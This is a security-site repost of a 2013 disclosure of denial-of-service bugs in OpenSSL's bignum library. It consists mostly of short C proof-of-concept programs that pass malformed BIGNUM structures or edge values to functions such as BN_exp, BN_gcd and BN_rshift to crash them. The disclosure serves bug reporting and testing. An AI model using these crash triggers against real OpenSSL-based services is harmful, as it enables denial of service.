首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
OpenSSL Denial Of Service
来源:http://www.inbox.com/smileys 作者:AKAT-1 发布时间:2013-12-05  
General info:
=============
The bn (multiprecision integer arithmetics) part of the OpenSSL library is prone to null ptr deref, off-by-one and others resulting in DoS/crashes.
Versions tested were between 0.9.8k and 1.0.1e. We were too laz*cough* busy to prepare the fancy table, sorry guys.
Some PoC will work for one version but not for the other. Your milage may vary, so you'll have to test it by yourself.

bn_div_words.c:
===============
-- cut
/*  BN_ULONG bn_div_words(BN_ULONG h, BN_ULONG l, BN_ULONG d);
    bn_div_words(h, l, d) divides the two word number (h,l) by d and returns the result.


#  if defined(__i386) || defined (__i386__)
    *
    * There were two reasons for implementing this template:
    * - GNU C generates a call to a function (__udivdi3 to be exact)
    *   in reply to ((((BN_ULLONG)n0)<<BN_BITS2)|n1)/d0 (I fail to
    *   understand why...);
    * - divl doesn't only calculate quotient, but also leaves
    *   remainder in %edx which we can definitely use here:-)
    *
    *                   <appro@fy.chalmers.se>
    *
#  define bn_div_words(n0,n1,d0)        \
    ({  asm volatile (          \
        "divl   %4"         \
        : "=a"(q), "=d"(rem)        \
        : "a"(n1), "d"(n0), "g"(d0) \
        : "cc");            \
        q;                  \
    })
#  define REMAINDER_IS_ALREADY_CALCULATED
#  elif defined(__x86_64) && defined(SIXTY_FOUR_BIT_LONG)
    *
    * Same story here, but it's 128-bit by 64-bit division. Wow!
    *                   <appro@fy.chalmers.se>
    *
#  define bn_div_words(n0,n1,d0)        \
    ({  asm volatile (          \
        "divq   %4"         \
        : "=a"(q), "=d"(rem)        \
        : "a"(n1), "d"(n0), "g"(d0) \
        : "cc");            \
        q;                  \
    })

*/


#include <stdio.h>
#include <string.h>
#include <openssl/bn.h>
#include <openssl/rand.h>


int
main(int argc, char **argv)
{
    BN_ULONG q,d0,n0,n1,rem=0;

    n0 = 10UL;  // if n0 >= d0 then Floating point exception
    n1 = 100UL;
    d0 = 10UL;


    printf("%lu\n", bn_div_words(n0, n1, d0));
        return 0;
}

-- cut

BN_exp_dos.c:
=============
-- cut
/*  int BN_exp(BIGNUM *r, BIGNUM *a, BIGNUM *p, BN_CTX *ctx);
    BN_exp() raises a to the p-th power and places the result in r ("r=a^p"). This function is faster than repeated applications of BN_mul().
*/
#include <stdio.h>
#include <string.h>
#include <openssl/bn.h>
#include <openssl/rand.h>


int
main(int argc, char **argv)
{
    BN_CTX *c = BN_CTX_new();
    BIGNUM *x,*y,*z,*p1,*p2,*p3;
    x = BN_new();
    y = BN_new();
    z = BN_new();

    x->d = (BN_ULONG *) malloc(1);
    x->d[0] = 0;
    x->top = 13645;
    x->dmax = 13645;
    x->neg = 0;
    x->flags = 1;

    y->d = (BN_ULONG *) malloc(1);
    y->d[0] = 2;
    y->top = 1;
    y->dmax = 1;
    y->neg = 1;
    y->flags = 1;

    z->d = (BN_ULONG *) malloc(1);
    z->d[0] = 34427664;
    z->top = 1;
    z->dmax = 1;
    z->neg = 0;
    z->flags = 0;

    printf("%d\n", BN_exp(x, y, z, c));
        return 0;
}

-- cut

BN_gcd_dos.c:
=============
-- cut
/*  int BN_gcd(BIGNUM *r, BIGNUM *a, BIGNUM *b, BN_CTX *ctx);
    BN_gcd() computes the greatest common divisor of a and b and p
*/
#include <stdio.h>
#include <string.h>
#include <openssl/bn.h>
#include <openssl/rand.h>


int
main(int argc, char **argv)
{
    BN_CTX *c = BN_CTX_new();
    BIGNUM *x,*y,*z,*p1,*p2,*p3;
    x = BN_new();
    y = BN_new();
    z = BN_new();

    x->d = (BN_ULONG *) malloc(1);
    x->d[0] = 1;
    x->top = 0;
    x->dmax = 2;
    x->neg = 0;
    x->flags = 1;

    y->d = (BN_ULONG *) malloc(1);
    y->d[0] = 1;
    y->top = 1;
    y->dmax = 1;
    y->neg = 0;
    y->flags = 0;

    z->d = (BN_ULONG *) malloc(1);
    z->d[0] = 0;
    z->top = 1;
    z->dmax = 2;
    z->neg = 0;
    z->flags = 0;

    printf("PoC works for OpenSSL v1.0.1c but not for v0.9.8k\n");
    printf("%d\n", BN_gcd(x, y, z, c));
        return 0;
}

-- cut

BN_mod_add.c:
=============
-- cut
/*  int BN_mod_add(BIGNUM *r, BIGNUM *a, BIGNUM *b, const BIGNUM *m, BN_CTX *ctx);
    BN_mod_add() adds a to b modulo m and places the non-negative result in r.
*/
#include <stdio.h>
#include <string.h>
#include <openssl/bn.h>
#include <openssl/rand.h>


int
main(int argc, char **argv)
{
    BN_CTX *c = BN_CTX_new();
    BIGNUM *x,*y,*z,*v;
    x = BN_new();
    y = BN_new();
    z = BN_new();
    v = BN_new();

    x->d = (BN_ULONG *) malloc(1);
    x->d[0] = 262144;
    x->top = 1;
    x->dmax = 2;
    x->neg = 0;
    x->flags = 1;

    y->d = (BN_ULONG *) malloc(1);
    y->d[0] = 262144;
    y->top = 1;
    y->dmax = 1;
    y->neg = 0;
    y->flags = 0;

    z->d = (BN_ULONG *) malloc(1);
    z->d[0] = 0;
    z->top = 0;
    z->dmax = 1;
    z->neg = 0;
    z->flags = 1;

    v->d = (BN_ULONG *) malloc(1);
    v->d[0] = 0;
    v->top = 1;
    v->dmax = 1;
    v->neg = 0;
    v->flags = 1;

    // triggers bug in bn_div_words()
    printf("%d\n", BN_mod_add(x, y, z, v, c));
        return 0;
}

-- cut

BN_rshift.c:
============
-- cut
/*  int BN_rshift(BIGNUM *r, BIGNUM *a, int n);
    BN_rshift() shifts a right by n bits and places the result in r ("r=a/2^n"). BN_rshift1() shifts a right by one and places the result in r ("r=a/2").

int BN_rshift(BIGNUM *r, const BIGNUM *a, int n)
    {
    int i,j,nw,lb,rb;
    BN_ULONG *t,*f;
    BN_ULONG l,tmp;

    bn_check_top(r);
    bn_check_top(a);

    nw=n/BN_BITS2;  0
    rb=n%BN_BITS2;  0
    lb=BN_BITS2-rb; 64
    if (nw >= a->top || a->top == 0)
        {
        BN_zero(r);
        return(1);
        }
    i = (BN_num_bits(a)-n+(BN_BITS2-1))/BN_BITS2;

    if (r != a)
        {
        r->neg=a->neg;

        if (bn_wexpand(r,i) == NULL) return(0);
        }
    else
        {
        if (n == 0)
            return 1; // or the copying loop will go berserk
        }
    f= &(a->d[nw]);

    t=r->d;

    j=a->top-nw;

    r->top=i;

    if (rb == 0)
        {
        for (i=j; i != 0; i--)
            *(t++)= *(f++);             <---- oops
        }
    else
        {
        l= *(f++);
        for (i=j-1; i != 0; i--)
            {
            tmp =(l>>rb)&BN_MASK2;
            l= *(f++);
            *(t++) =(tmp|(l<<lb))&BN_MASK2;
            }
        if ((l = (l>>rb)&BN_MASK2)) *(t) = l;
        }
    bn_check_top(r);
    return(1);
    }
*/

#include <stdio.h>
#include <string.h>
#include <openssl/bn.h>
#include <openssl/rand.h>


int
main(int argc, char **argv)
{
    BN_CTX *c = BN_CTX_new();
    BIGNUM *x,*y,*z,*p1,*p2,*p3;
    x = BN_new();
    y = BN_new();
    z = BN_new();

    x->d = NULL;
    x->top = 0;
    x->dmax = 0;
    x->neg = 0;
    x->flags = 0;

    y->d = (BN_ULONG *) malloc(1);
    y->d[0] = 0;
    y->top = 1;
    y->dmax = 1;
    y->neg = 0;
    y->flags = 1;

    printf("%d\n", BN_rshift(x, y, 0));
        return 0;
}

-- cut

BN_bn2hex.c:
============
-- cut
/*  char *BN_bn2hex(const BIGNUM *a);
    BN_bn2hex() and BN_bn2dec() return printable strings containing the hexadecimal and decimal encoding of a respectively. For negative numbers, the string is prefaced with a leading '-'. The string must be freed later using
    OPENSSL_free().
*/

#include <stdio.h>
#include <openssl/bn.h>

int
main(int argc, char **argv)
{
    BIGNUM *z,*o;
    BN_CTX *ctx = BN_CTX_new();

    z = BN_new();
    o = BN_new();


    BN_zero(z);
    BN_one(o);
    BN_set_negative(o, 1);
    BN_sqr(o, z, ctx);

    printf("%s\n", BN_bn2hex(o));

    return 0;
}

-- cut

BN_add_word.c:
==============
-- cut
/*  int BN_add_word(BIGNUM *a, BN_ULONG w);
    BN_add_word() adds w to a ("a+=w").
*/

#include <stdio.h>
#include <openssl/bn.h>

int
main(int argc, char **argv)
{
    BIGNUM *z,*o;
    BN_CTX *ctx = BN_CTX_new();

    z = BN_new();
    o = BN_new();


    BN_set_word(o, 2);
    BN_add_word(o, 18446744073709551615LL);

    return 0;
}

-- cut

Credits:
========
AKAT-1, 22733db72ab3ed94b5f8a1ffcde850251fe6f466, c8e74ebd8392fda4788179f9a02bb49337638e7b

____________________________________________________________
GET FREE SMILEYS FOR YOUR IM & EMAIL - Learn more at http://www.inbox.com/smileys
Works with AIM庐, MSN庐 Messenger, Yahoo!庐 Messenger, ICQ庐, Google Talk鈩� and most webmails


 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·D-Link DIR-XXX Remote Root Acc
·Kaseya uploadImage Arbitrary F
·TP-Link 150M Wireless Lite N R
·Joomla Hotornot2 Shell Upload
·Firefox FBTest 1.12b4 Command
·Steinberg MyMp3PRO 5.0 - Buffe
·Windows NDPROXY Local SYSTEM P
·D-Link DSR Router Remote Root
·Steinberg MyMp3PRO v5.0 DEP By
·Eaton Network Shutdown Module
·Steinberg MyMp3PRO v5.0 SEH Bu
·Up.Time Monitoring Station pos
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved